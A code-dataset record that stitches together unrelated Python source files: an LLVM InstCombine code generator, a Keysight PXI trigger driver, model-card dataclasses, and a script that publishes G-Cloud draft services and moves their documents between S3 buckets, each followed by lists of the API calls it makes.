CFunctionCall('replaceInstUsesWith', CVariable('*I'), cg.get_cexp(new_root.v))))
else:
body.extend(new_root.visit_target(cg, False))
body.append(CReturn(cg.get_cexp(new_root)))
cif = CIf(CBinExpr.reduce('&&', clauses), body).format()
decl_it = CDefinition.block((t, CVariable(v))
for v,t in cg.name_type.items() if v != 'I')
decl = iter_seq(line + d.format() for d in decl_it)
code = nest(2,
seq(line, '{ // ', name,
nest(2, seq(decl, line, line, cif)), line, '}'))
out.write(code.format())
def generate_suite(opts, out):
opts = list(zip(count(1), opts))
# gather names of testcases
if DO_STATS:
for rule, opt in opts:
name = opt[0]
# TODO: abstract this
src_root = get_root(opt[4]).getOpName()
# FIXME: sanitize name
out.write('STATISTIC(Rule{0}, "{0}. {1} {2}");\n'.format(rule, src_root, name))
out.write('\n')
out.write('Instruction *InstCombiner::runOnInstruction(Instruction *I) {\n')
if SIMPLIFY:
out.write('''
if (Value *V = SimplifyInstruction(I, SQ)) {
return replaceInstUsesWith(*I, V);
}
''')
for rule, opt in opts:
generate_opt(rule, opt, out)
out.write('\n\n return nullptr;\n}\n')
llvm_opcode = {
'add': 'Instruction::Add',
'sub': 'Instruction::Sub',
'mul': 'Instruction::Mul',
'sdiv': 'Instruction::SDiv',
'srem': 'Instruction::SRem',
'udiv': 'Instruction::UDiv',
'urem': 'Instruction::URem',
'shl': 'Instruction::Shl',
'lshr': 'Instruction::LShr',
'ashr': 'Instruction::AShr',
'and': 'Instruction::And',
'or': 'Instruction::Or',
'xor': 'Instruction::Xor',
'sext': 'Instruction::SExt',
'zext': 'Instruction::ZExt',
'trunc': 'Instruction::Trunc',
'ptrtoint': 'Instruction::PtrToInt',
'inttoptr': 'Instruction::IntToPtr',
'bitcast': 'Instruction::BitCast',
'icmp': 'Instruction::ICmp',
'select': 'Instruction::Select',
}
def generate_switched_suite(opts, out):
root_opts = defaultdict(list)
opts = list(zip(count(1), opts))
# gather names of testcases
if DO_STATS:
for rule, opt in opts:
name = opt[0]
# TODO: abstract this
src_root = get_root(opt[4]).getOpName()
# FIXME: sanitize name
out.write('STATISTIC(Rule{0}, "{1}.{0}. {2}");\n'.format(rule, src_root, name))
out.write('Instruction *InstCombiner::runOnInstruction(Instruction *I) {\n')
if SIMPLIFY:
out.write('''
if (Value *V = SimplifyInstruction(I, SQ)) {
return replaceInstUsesWith(*I, V);
}
''')
out.write(' switch (I->getOpcode()) {\n default: break;\n')
# sort opts by root opcode
for opt in opts:
root_opts[get_root(opt[1][4]).getOpName()].append(opt)
for root, opts in root_opts.items():
if root not in llvm_opcode:
continue
out.write(' case {0}:\n'.format(llvm_opcode[root]))
for rule, opt in opts:
generate_opt(rule, opt, out)
out.write('\n break;\n\n')
out.write('''
}
return nullptr;
}
''')
if __name__ == '__main__':
input = sys.stdin.read()
generate_switched_suite(parse_opt_file(input), sys.stdout)
|
[
"sys.stdin.read",
"asdl.lang.alive_lang.alive.parser.parse_opt_file",
"itertools.count",
"collections.defaultdict",
"pprint.pprint",
"re.sub"
] |
[((17353, 17370), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (17364, 17370), False, 'from collections import defaultdict\n'), ((18399, 18415), 'sys.stdin.read', 'sys.stdin.read', ([], {}), '()\n', (18413, 18415), False, 'import argparse, glob, re, sys\n'), ((2963, 2979), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (2974, 2979), False, 'from collections import defaultdict\n'), ((3390, 3412), 'pprint.pprint', 'pprint', (['self.key_names'], {}), '(self.key_names)\n', (3396, 3412), False, 'from pprint import pprint\n'), ((3446, 3464), 'pprint.pprint', 'pprint', (['self.names'], {}), '(self.names)\n', (3452, 3464), False, 'from pprint import pprint\n'), ((3927, 3951), 'pprint.pprint', 'pprint', (['self.named_types'], {}), '(self.named_types)\n', (3933, 3951), False, 'from pprint import pprint\n'), ((18442, 18463), 'asdl.lang.alive_lang.alive.parser.parse_opt_file', 'parse_opt_file', (['input'], {}), '(input)\n', (18456, 18463), False, 'from asdl.lang.alive_lang.alive.parser import parse_opt_file\n'), ((6763, 6796), 're.sub', 're.sub', (['"""[^a-zA-Z0-9_]"""', '""""""', 'hint'], {}), "('[^a-zA-Z0-9_]', '', hint)\n", (6769, 6796), False, 'import argparse, glob, re, sys\n'), ((6879, 6903), 're.sub', 're.sub', (['"""__+"""', '"""_"""', 'hint'], {}), "('__+', '_', hint)\n", (6885, 6903), False, 'import argparse, glob, re, sys\n'), ((6917, 6942), 're.sub', 're.sub', (['"""^_|_$"""', '""""""', 'hint'], {}), "('^_|_$', '', hint)\n", (6923, 6942), False, 'import argparse, glob, re, sys\n'), ((15979, 15987), 'itertools.count', 'count', (['(1)'], {}), '(1)\n', (15984, 15987), False, 'from itertools import combinations, count\n'), ((17389, 17397), 'itertools.count', 'count', (['(1)'], {}), '(1)\n', (17394, 17397), False, 'from itertools import combinations, count\n')]
|
#!/usr/bin/env python
import sys
import os
import numpy as np
from BaseDriver import LabberDriver, Error
sys.path.append('C:\\Program Files (x86)\\Keysight\\SD1\\Libraries\\Python')
import keysightSD1
class Driver(LabberDriver):
"""Keysigh PXI HVI trigger"""
def performOpen(self, options={}):
"""Perform the operation of opening the instrument connection"""
# timeout
self.timeout_ms = int(1000 * self.dComCfg['Timeout'])
# get PXI chassis
self.chassis = int(self.comCfg.address)
# auto-scan chassis address
n_unit = keysightSD1.SD_Module.moduleCount()
all_chassis = [
keysightSD1.SD_Module.getChassisByIndex(n) for n in range(n_unit)]
# check if user-given chassis is available
if n_unit > 0 and self.chassis not in all_chassis:
# if all units are in the same chassis, override given PXI chassis
if np.all(np.array(all_chassis) == all_chassis[0]):
self.chassis = all_chassis[0]
# number of slots in chassis
self.n_slot = 18
# supported AWGs and Digitizers
self.AWGS = ['M3201', 'M3202', 'M3300', 'M3302']
self.DIGS = ['M3100', 'M3102']
# keep track of current PXI configuration
# 0: None, 1: AWG, 2: Digitizer
self.units = [0] * self.n_slot
self.old_trig_period = -1.0
self.old_dig_delay = -1.0
# Create HVI object
self.HVI = keysightSD1.SD_HVI()
def performClose(self, bError=False, options={}):
"""Perform the close instrument connection operation"""
# do not check for error if close was called with an error
try:
# close instrument
self.HVI.stop()
self.HVI.close()
except Exception:
# never return error here
pass
def performSetValue(self, quant, value, sweepRate=0.0, options={}):
"""Perform the Set Value instrument operation. This function should
return the actual value set by the instrument"""
# continue depending on quantity
if quant.name == 'Auto-detect':
# auto-detect units
if value:
self.auto_detect()
elif quant.name == 'Scan':
# when scanning, just run auto-detect
self.auto_detect()
else:
# just set the quantity value, config will be set at final call
quant.setValue(value)
# only update configuration at final call
if self.isFinalCall(options):
self.configure_hvi()
return value
def configure_hvi(self):
"""Configure and start/stop HVI depending on UI settings"""
# get units
units = self.get_pxi_config_from_ui()
n_awg = len([x for x in units if x == 1])
n_dig = len([x for x in units if x == 2])
# if no units in use, just stop
if (n_awg + n_dig) == 0:
self.HVI.stop()
return
# check if unit configuration changed, if so reload HVI
if units != self.units:
# stop current HVI, may not even be running
self.HVI.stop()
self.HVI.close()
self.units = units
# we need at least one AWG
if n_awg == 0:
raise Error('This driver requires at least one AWG.')
# currently only support 2 digitizers
if n_dig > 2:
raise Error('This driver only supports up to two digitizers.')
# get HVI name and open
hvi_name = 'InternalTrigger_%d_%d.HVI' % (n_awg, n_dig)
dir_path = os.path.dirname(os.path.realpath(__file__))
self.HVI.open(os.path.join(dir_path, 'HVI_Delay', hvi_name))
# assign units, run twice to ignore errors before all units are set
for m in range(2):
awg_number = 0
dig_number = 0
for n, unit in enumerate(units):
# if unit in use, assign to module
if unit == 0:
continue
elif unit == 1:
# AWG
module_name = 'Module %d' % awg_number
awg_number += 1
elif unit == 2:
# digitizer
module_name = 'DAQ %d' % dig_number
dig_number += 1
r = self.HVI.assignHardwareWithUserNameAndSlot(
module_name, self.chassis, n + 1)
# only check for errors after second run
if m > 0:
self.check_keysight_error(r)
# clear old trig period to force update
self.old_trig_period = 0.0
# only update trig period if necessary, takes time to re-compile
if (self.getValue('Trig period') != self.old_trig_period or
self.getValue('Digitizer delay') != self.old_dig_delay):
self.old_trig_period = self.getValue('Trig period')
self.old_dig_delay = self.getValue('Digitizer delay')
# update trig period, include 460 ns delay in HVI
wait = round(self.getValue('Trig period') / 10E-9) - 46
digi_wait = round(self.getValue('Digitizer delay') / 10E-9)
# special case if only one module: add 240 ns extra delay
if (n_awg + n_dig) == 1:
wait += 24
# r = self.HVI.writeIntegerConstantWithIndex(0, 'Wait time', wait)
r = self.HVI.writeIntegerConstantWithUserName(
'Module 0', 'Wait time', wait)
self.check_keysight_error(r)
self.log('Number of modules', self.HVI.getNumberOfModules())
for n in range(n_dig):
r = self.HVI.writeIntegerConstantWithUserName(
'DAQ %d' % n, 'Digi wait', digi_wait)
self.check_keysight_error(r)
# need to recompile after setting wait time, not sure why
self.check_keysight_error(self.HVI.compile())
# try to load a few times, sometimes hangs on first try
n_try = 5
while True:
try:
self.check_keysight_error(self.HVI.load())
break
except Exception:
n_try -= 1
if n_try <= 0:
raise
# start or stop the HVI, depending on output state
if self.getValue('Output'):
self.check_keysight_error(self.HVI.start())
else:
self.HVI.stop()
def check_keysight_error(self, code):
"""Check and raise error"""
if code >= 0:
return
# get error message
raise Error(keysightSD1.SD_Error.getErrorMessage(code))
def auto_detect(self):
"""Auto-detect units"""
# start by clearing old config
for n in range(self.n_slot):
self.setValue('Slot %d' % (n + 1), 0)
# loop through all units, make sure chassis match
n_unit = keysightSD1.SD_Module.moduleCount()
for n in range(n_unit):
chassis = keysightSD1.SD_Module.getChassisByIndex(n)
slot = keysightSD1.SD_Module.getSlotByIndex(n)
# if chassis match, check unit type
if chassis == self.chassis:
model = keysightSD1.SD_Module.getProductNameByIndex(n)
if model[:5] in self.AWGS:
self.setValue('Slot %d' % slot, 'AWG')
elif model[:5] in self.DIGS:
self.setValue('Slot %d' % slot, 'Digitizer')
def get_pxi_config_from_ui(self):
"""Get PXI config from user interface"""
units = []
for n in range(self.n_slot):
units.append(self.getValueIndex('Slot %d' % (n + 1)))
return units
if __name__ == '__main__':
pass
|
[
"sys.path.append",
"BaseDriver.Error",
"keysightSD1.SD_Module.getProductNameByIndex",
"keysightSD1.SD_Module.getSlotByIndex",
"os.path.realpath",
"keysightSD1.SD_Module.moduleCount",
"keysightSD1.SD_HVI",
"keysightSD1.SD_Module.getChassisByIndex",
"numpy.array",
"os.path.join",
"keysightSD1.SD_Error.getErrorMessage"
] |
[((105, 181), 'sys.path.append', 'sys.path.append', (['"""C:\\\\Program Files (x86)\\\\Keysight\\\\SD1\\\\Libraries\\\\Python"""'], {}), "('C:\\\\Program Files (x86)\\\\Keysight\\\\SD1\\\\Libraries\\\\Python')\n", (120, 181), False, 'import sys\n'), ((585, 620), 'keysightSD1.SD_Module.moduleCount', 'keysightSD1.SD_Module.moduleCount', ([], {}), '()\n', (618, 620), False, 'import keysightSD1\n'), ((1469, 1489), 'keysightSD1.SD_HVI', 'keysightSD1.SD_HVI', ([], {}), '()\n', (1487, 1489), False, 'import keysightSD1\n'), ((7161, 7196), 'keysightSD1.SD_Module.moduleCount', 'keysightSD1.SD_Module.moduleCount', ([], {}), '()\n', (7194, 7196), False, 'import keysightSD1\n'), ((657, 699), 'keysightSD1.SD_Module.getChassisByIndex', 'keysightSD1.SD_Module.getChassisByIndex', (['n'], {}), '(n)\n', (696, 699), False, 'import keysightSD1\n'), ((6855, 6897), 'keysightSD1.SD_Error.getErrorMessage', 'keysightSD1.SD_Error.getErrorMessage', (['code'], {}), '(code)\n', (6891, 6897), False, 'import keysightSD1\n'), ((7251, 7293), 'keysightSD1.SD_Module.getChassisByIndex', 'keysightSD1.SD_Module.getChassisByIndex', (['n'], {}), '(n)\n', (7290, 7293), False, 'import keysightSD1\n'), ((7313, 7352), 'keysightSD1.SD_Module.getSlotByIndex', 'keysightSD1.SD_Module.getSlotByIndex', (['n'], {}), '(n)\n', (7349, 7352), False, 'import keysightSD1\n'), ((3333, 3380), 'BaseDriver.Error', 'Error', (['"""This driver requires at least one AWG."""'], {}), "('This driver requires at least one AWG.')\n", (3338, 3380), False, 'from BaseDriver import LabberDriver, Error\n'), ((3479, 3535), 'BaseDriver.Error', 'Error', (['"""This driver only supports up to two digitizers."""'], {}), "('This driver only supports up to two digitizers.')\n", (3484, 3535), False, 'from BaseDriver import LabberDriver, Error\n'), ((3680, 3706), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (3696, 3706), False, 'import os\n'), ((3734, 3779), 'os.path.join', 'os.path.join', (['dir_path', '"""HVI_Delay"""', 'hvi_name'], {}), "(dir_path, 'HVI_Delay', hvi_name)\n", (3746, 3779), False, 'import os\n'), ((7465, 7511), 'keysightSD1.SD_Module.getProductNameByIndex', 'keysightSD1.SD_Module.getProductNameByIndex', (['n'], {}), '(n)\n', (7508, 7511), False, 'import keysightSD1\n'), ((935, 956), 'numpy.array', 'np.array', (['all_chassis'], {}), '(all_chassis)\n', (943, 956), True, 'import numpy as np\n')]
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model Card Data Class.
The Model Card (MC) is the document designed for transparent reporting of AI
model provenance, usage, and ethics-informed evaluation. The model card can be
presented by different formats (e.g. HTML, PDF, Markdown). The properties of
the Model Card (MC) are defined by a json schema. The ModelCard class in the
ModelCardsToolkit serves as an API to read and write MC properties by the users.
"""
import json
from typing import Any, Dict, List, Optional, Text, Union
import dataclasses
@dataclasses.dataclass
class Version:
"""The information about verions of a model."""
# The name of the version.
name: Optional[Text] = None
# The date the version was released.
date: Optional[Text] = None
# The changes from the previous version.
diff: Optional[Text] = None
@dataclasses.dataclass
class Owner:
"""The information about owners of a model."""
# The name of the owner.
name: Optional[Text] = None
# The contact information of the owner.
contact: Optional[Text] = None
@dataclasses.dataclass
class ModelDetails:
"""Metadata about the model."""
# The name of the model.
name: Optional[Text] = None
# A description of the model card.
overview: Optional[Text] = None
# The individuals or teams who own the model.
owners: List[Owner] = dataclasses.field(default_factory=list)
# The version of the model.
version: Version = dataclasses.field(default_factory=Version)
# The model's license for use.
license: Optional[Text] = None
# Links providing more information about the model.
references: List[Text] = dataclasses.field(default_factory=list)
# How to reference this model card.
citation: Optional[Text] = None
@dataclasses.dataclass
class Graphic:
"""A named inline plot."""
# The name of the graphic.
name: Text
# The image string encoded as a base64 string.
image: Text
@dataclasses.dataclass
class Graphics:
"""A collection of graphics."""
# A description of this collection of graphics.
description: Optional[Text] = None
# A collection of graphics.
collection: List[Graphic] = dataclasses.field(default_factory=list)
@dataclasses.dataclass
class Dataset:
"""The information about a dataset used to generate a model."""
# The name of the dataset.
name: Optional[Text] = None
# The contact information of the owner
link: Optional[Text] = None
# Does this dataset contain human or other sensitive data?
sensitive: Optional[bool] = None
# Visualizations of the dataset.
graphics: Graphics = dataclasses.field(default_factory=Graphics)
@dataclasses.dataclass
class Data:
"""The related datasets used to train and evaluate the model."""
# The training dataset
train: Dataset = dataclasses.field(default_factory=Dataset)
# The evaluation dataset
eval: Dataset = dataclasses.field(default_factory=Dataset)
@dataclasses.dataclass
class ModelParameters:
"""Parameters for construction of the model."""
# The architecture of the model.
model_architecture: Optional[Text] = None
# The datasets used to train and evaluate the model.
data: Data = dataclasses.field(default_factory=Data)
# The data format for inputs to the model.
input_format: Optional[Text] = None
# The data format for outputs from the model.
output_format: Optional[Text] = None
@dataclasses.dataclass
class ConfidenceInterval:
"""The confidence interval of the metric."""
# The lower bound of the confidence interval.
lower_bound: float
# The upper bound of the confidence interval.
upper_bound: float
@dataclasses.dataclass
class PerformanceMetric:
"""The details of the performance metric."""
# The type of performance metric.
type: Text
# The value of the performance metric.
value: Union[int, float, Text]
# The confidence interval of the metric.
confidence_interval: Optional[ConfidenceInterval] = None
# The decision threshold the metric was computed on.
threshold: Optional[float] = None
# The name of the slice this metric was computed on.
slice: Optional[Text] = None
@dataclasses.dataclass
class QuantitativeAnalysis:
"""The quantitative analysis of a model."""
# The model performance metrics being reported.
performance_metrics: List[PerformanceMetric] = dataclasses.field(
default_factory=list)
# Visualizations of model performance.
graphics: Graphics = dataclasses.field(default_factory=Graphics)
@dataclasses.dataclass
class Risk:
"""The information about risks when using the model."""
# The name of the risk.
name: Text
# Strategy used to address this risk.
mitigation_strategy: Text
@dataclasses.dataclass
class Considerations:
"""Considerations related to model construction, training, and application."""
# Who are the intended users of the model?
users: List[Text] = dataclasses.field(default_factory=list)
# What are the intended use cases of the model.
use_cases: List[Text] = dataclasses.field(default_factory=list)
# What are the known technical limitations of the model.
limitations: List[Text] = dataclasses.field(default_factory=list)
# What are the known tradeoffs in accuracy/performance of the model
tradeoffs: List[Text] = dataclasses.field(default_factory=list)
# What are the ethical risks involved in the application of this model.
ethical_considerations: List[Risk] = dataclasses.field(default_factory=list)
@dataclasses.dataclass
class ModelCard:
"""Fields used to generate the Model Card."""
# The json schema version of the ModelCard
schema_version: Optional[Text] = None
# Descriptive metadata for the model.
model_details: ModelDetails = dataclasses.field(default=ModelDetails())
# Parameters used when generating the model.
model_parameters: ModelParameters = dataclasses.field(
default_factory=ModelParameters)
# The quantitative analysis of the ModelCard
quantitative_analysis: QuantitativeAnalysis = dataclasses.field(
default_factory=QuantitativeAnalysis)
# The considerations related to model construction, training, and application.
considerations: Considerations = dataclasses.field(
default_factory=Considerations)
def to_dict(self) -> Dict[Text, Any]:
# ignore None properties recusively to allow missing values.
ignore_none = lambda properties: {k: v for k, v in properties if v}
return dataclasses.asdict(self, dict_factory=ignore_none)
def to_json(self) -> Text:
return json.dumps(self.to_dict(), indent=2)
|
[
"dataclasses.field",
"dataclasses.asdict"
] |
[((1877, 1916), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (1894, 1916), False, 'import dataclasses\n'), ((1968, 2010), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Version'}), '(default_factory=Version)\n', (1985, 2010), False, 'import dataclasses\n'), ((2158, 2197), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (2175, 2197), False, 'import dataclasses\n'), ((2666, 2705), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (2683, 2705), False, 'import dataclasses\n'), ((3096, 3139), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Graphics'}), '(default_factory=Graphics)\n', (3113, 3139), False, 'import dataclasses\n'), ((3288, 3330), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Dataset'}), '(default_factory=Dataset)\n', (3305, 3330), False, 'import dataclasses\n'), ((3376, 3418), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Dataset'}), '(default_factory=Dataset)\n', (3393, 3418), False, 'import dataclasses\n'), ((3666, 3705), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Data'}), '(default_factory=Data)\n', (3683, 3705), False, 'import dataclasses\n'), ((4809, 4848), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (4826, 4848), False, 'import dataclasses\n'), ((4920, 4963), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Graphics'}), '(default_factory=Graphics)\n', (4937, 4963), False, 'import dataclasses\n'), ((5361, 5400), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5378, 5400), False, 'import dataclasses\n'), ((5477, 5516), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5494, 5516), False, 'import dataclasses\n'), ((5604, 5643), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5621, 5643), False, 'import dataclasses\n'), ((5740, 5779), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5757, 5779), False, 'import dataclasses\n'), ((5893, 5932), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5910, 5932), False, 'import dataclasses\n'), ((6307, 6357), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'ModelParameters'}), '(default_factory=ModelParameters)\n', (6324, 6357), False, 'import dataclasses\n'), ((6460, 6515), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'QuantitativeAnalysis'}), '(default_factory=QuantitativeAnalysis)\n', (6477, 6515), False, 'import dataclasses\n'), ((6639, 6688), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Considerations'}), '(default_factory=Considerations)\n', (6656, 6688), False, 'import dataclasses\n'), ((6885, 6935), 'dataclasses.asdict', 'dataclasses.asdict', (['self'], {'dict_factory': 'ignore_none'}), '(self, dict_factory=ignore_none)\n', (6903, 6935), False, 'import dataclasses\n')]
|
#!/usr/bin/env python3
"""
PREREQUISITE: For document migration to work you'll need AWS credentials set up for the relevant environment:
Save your aws_access_key_id and aws_secret_access_key in ~/.aws/credentials
If you have more than one set of credentials in there then be sure to set your AWS_PROFILE environment
variable to reference the right credentials before running the script.
THIS SCRIPT NEEDS TO BE RUN BY AN AWS IAM ENTITY FROM THE SAME ACCOUNT AS THE DOCUMENTS BUCKET BEING
UPLOADED TO. THIS IS SO THE S3 OBJECT OWNER IS THAT ACCOUNT AND NOT A DIFFERENT ACCOUNT. OTHERWISE THERE
WILL BE PERMISSION ISSUES IF A SUPPLIER UPDATES THEIR DOCUMENTS. CHANGING OBJECT OWNERS ONCE UPLOADED
IS NOT IMPOSSIBLE BUT IT IS A RIGHT FAFF. CURRENTLY THERE IS NOT AN EASY WAY TO DO THIS FROM JENKINS. A
PROCESS COULD BE SET UP TO ALLOW JENKINS TO ASSUME A DIFFERENT ROLE.
For a G-Cloud style framework (with uploaded documents to migrate) this will:
1. Find all suppliers awarded onto the framework
2. Find all their submitted draft services on the framework
3. Migrate these from drafts to "real" services, which includes moving documents to the live documents bucket
and updating document URLs in the migrated version of the services
Usage:
scripts/publish-g-cloud-draft-services.py <framework_slug> <stage> <draft_bucket>
<documents_bucket> [--dry-run] [--draft-ids=<filename>]
If you specify the `--draft-ids` parameter, pass in list of newline-separated draft ids. This script will then do a
full re-publish of just those drafts (i.e. try to re-publish it, and then copy the documents across again and update
those links).
"""
import backoff
import collections
from datetime import datetime
from docopt import docopt
import random
import re
import sys
sys.path.insert(0, '.')
import dmapiclient
from dmscripts.helpers.auth_helpers import get_auth_token
from dmscripts.helpers.framework_helpers import find_suppliers_on_framework, get_submitted_drafts
from dmapiclient import DataAPIClient
from dmutils.s3 import S3, S3ResponseError
from dmutils.env_helpers import get_api_endpoint_from_stage, get_assets_endpoint_from_stage
DOCUMENT_KEYS = [
'pricingDocumentURL', 'serviceDefinitionDocumentURL',
'sfiaRateDocumentURL', 'termsAndConditionsDocumentURL',
]
def assert_equal(one, two):
assert one == two, "{} != {}".format(one, two)
def parse_document_url(url, framework_slug):
pattern = r'/{}/submissions/(\d+)/(\d+)-(.*)$'.format(re.escape(framework_slug))
match = re.search(pattern, url)
if not match:
raise ValueError("Could not parse document URL {}".format(url))
return {
'supplier_id': match.group(1),
'draft_id': match.group(2),
'document_name': match.group(3),
}
def get_draft_document_path(parsed_document, framework_slug):
return '{framework_slug}/submissions/{supplier_id}/{draft_id}-{document_name}'.format(
framework_slug=framework_slug,
**parsed_document)
def get_live_document_path(parsed_document, framework_slug, service_id):
return '{framework_slug}/documents/{supplier_id}/{service_id}-{document_name}'.format(
framework_slug=framework_slug,
service_id=service_id,
**parsed_document)
def get_live_asset_url(live_document_path):
return "{}/{}".format(get_assets_endpoint_from_stage(STAGE), live_document_path)
def document_copier(draft_bucket, documents_bucket, dry_run):
def copy_document(draft_document_path, live_document_path):
if not draft_bucket.path_exists(draft_document_path):
raise ValueError("Draft document {} does not exist in bucket {}".format(
draft_document_path, draft_bucket.bucket_name))
message_suffix = "{}:{} to {}:{}".format(
draft_bucket.bucket_name, draft_document_path,
documents_bucket.bucket_name, live_document_path)
if dry_run:
print(" > dry run: skipped copying {}".format(message_suffix))
else:
documents_bucket.copy(src_bucket=draft_bucket.bucket_name, src_key=draft_document_path,
target_key=live_document_path, acl='public-read')
print(" > copied {}".format(message_suffix))
return copy_document
@backoff.on_exception(backoff.expo, S3ResponseError, max_tries=5)
def copy_draft_documents(client, copy_document, draft_service, framework_slug, dry_run, service_id):
document_updates = {}
for document_key in DOCUMENT_KEYS:
if document_key in draft_service:
parsed_document = parse_document_url(draft_service[document_key], framework_slug)
assert_equal(str(parsed_document['supplier_id']), str(draft_service['supplierId']))
assert_equal(str(parsed_document['draft_id']), str(draft_service['id']))
draft_document_path = get_draft_document_path(parsed_document, framework_slug)
live_document_path = get_live_document_path(parsed_document, framework_slug, service_id)
try:
copy_document(draft_document_path, live_document_path)
except ValueError as e:
if not str(e).startswith('Target key already exists in S3'):
raise e
document_updates[document_key] = get_live_asset_url(live_document_path)
if dry_run:
print(" > dry run: skipped updating document URLs {}".format(document_updates))
else:
client.update_service(service_id, document_updates, 'Moving documents to live bucket')
print(" > document URLs updated")
def make_draft_service_live(client, copy_document, draft_service, framework_slug, dry_run,
continue_if_published=False):
print(" > Migrating draft {}".format(draft_service['id']))
if dry_run:
service_id = random.randint(1000, 10000)
print(" > dry run: generating random test service ID: {}".format(service_id))
else:
try:
services = client.publish_draft_service(draft_service['id'], 'publish g-cloud draft services script')
service_id = services['services']['id']
print(" > draft service published - new service ID {}".format(service_id))
except dmapiclient.HTTPError as e:
if continue_if_published and e.status_code == 400 \
and str(e).startswith('Cannot re-publish a submitted service'):
published_draft = client.get_draft_service(draft_service['id'])
services = client.get_service(published_draft['services']['serviceId'])
service_id = services['services']['id']
else:
raise e
copy_draft_documents(client, copy_document, draft_service, framework_slug, dry_run, service_id)
if __name__ == '__main__':
arguments = docopt(__doc__)
STAGE = arguments['<stage>']
api_url = get_api_endpoint_from_stage(STAGE)
client = DataAPIClient(api_url, get_auth_token('api', STAGE))
DRAFT_BUCKET = S3(arguments['<draft_bucket>'])
DOCUMENTS_BUCKET = S3(arguments['<documents_bucket>'])
DRY_RUN = arguments['--dry-run']
FRAMEWORK_SLUG = arguments['<framework_slug>']
DRAFT_IDS = arguments['--draft-ids']
copy_document = document_copier(DRAFT_BUCKET, DOCUMENTS_BUCKET, DRY_RUN)
results = collections.Counter({'success': 0, 'fail': 0})
def get_draft_services():
if DRAFT_IDS:
with open(DRAFT_IDS) as draft_ids:
draft_ids = [line.strip() for line in draft_ids.read().split()]
for draft_id in draft_ids:
draft_service = client.get_draft_service(draft_id)['services']
supplier_framework = client.get_supplier_framework_info(draft_service['supplierId'], FRAMEWORK_SLUG)
if supplier_framework['onFramework']:
yield draft_service
else:
suppliers = find_suppliers_on_framework(client, FRAMEWORK_SLUG)
for supplier in suppliers:
print("Migrating drafts for supplier {}".format(supplier['supplierId']))
for draft in get_submitted_drafts(client, FRAMEWORK_SLUG, supplier['supplierId']):
yield draft
for draft_service in get_draft_services():
try:
make_draft_service_live(client, copy_document, draft_service, FRAMEWORK_SLUG, DRY_RUN,
continue_if_published=True if DRAFT_IDS else False)
results.update({'success': 1})
except Exception as e:
print("{} ERROR MIGRATING DRAFT {} TO LIVE: {}".format(datetime.now(), draft_service['id'], e))
results.update({'fail': 1})
print("Successfully published {} G-Cloud services".format(results.get('success')))
if results.get('fail'):
print("Failed to publish {} services because of errors".format(results.get('fail')))
exit(results.get('fail'))
|
[
"random.randint",
"docopt.docopt",
"dmscripts.helpers.auth_helpers.get_auth_token",
"sys.path.insert",
"dmutils.env_helpers.get_api_endpoint_from_stage",
"backoff.on_exception",
"re.escape",
"datetime.datetime.now",
"dmscripts.helpers.framework_helpers.find_suppliers_on_framework",
"collections.Counter",
"re.search",
"dmutils.env_helpers.get_assets_endpoint_from_stage",
"dmutils.s3.S3",
"dmscripts.helpers.framework_helpers.get_submitted_drafts"
] |
[((1887, 1910), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""."""'], {}), "(0, '.')\n", (1902, 1910), False, 'import sys\n'), ((4385, 4449), 'backoff.on_exception', 'backoff.on_exception', (['backoff.expo', 'S3ResponseError'], {'max_tries': '(5)'}), '(backoff.expo, S3ResponseError, max_tries=5)\n', (4405, 4449), False, 'import backoff\n'), ((2624, 2647), 're.search', 're.search', (['pattern', 'url'], {}), '(pattern, url)\n', (2633, 2647), False, 'import re\n'), ((6952, 6967), 'docopt.docopt', 'docopt', (['__doc__'], {}), '(__doc__)\n', (6958, 6967), False, 'from docopt import docopt\n'), ((7016, 7050), 'dmutils.env_helpers.get_api_endpoint_from_stage', 'get_api_endpoint_from_stage', (['STAGE'], {}), '(STAGE)\n', (7043, 7050), False, 'from dmutils.env_helpers import get_api_endpoint_from_stage, get_assets_endpoint_from_stage\n'), ((7137, 7168), 'dmutils.s3.S3', 'S3', (["arguments['<draft_bucket>']"], {}), "(arguments['<draft_bucket>'])\n", (7139, 7168), False, 'from dmutils.s3 import S3, S3ResponseError\n'), ((7192, 7227), 'dmutils.s3.S3', 'S3', (["arguments['<documents_bucket>']"], {}), "(arguments['<documents_bucket>'])\n", (7194, 7227), False, 'from dmutils.s3 import S3, S3ResponseError\n'), ((7450, 7496), 'collections.Counter', 'collections.Counter', (["{'success': 0, 'fail': 0}"], {}), "({'success': 0, 'fail': 0})\n", (7469, 7496), False, 'import collections\n'), ((2585, 2610), 're.escape', 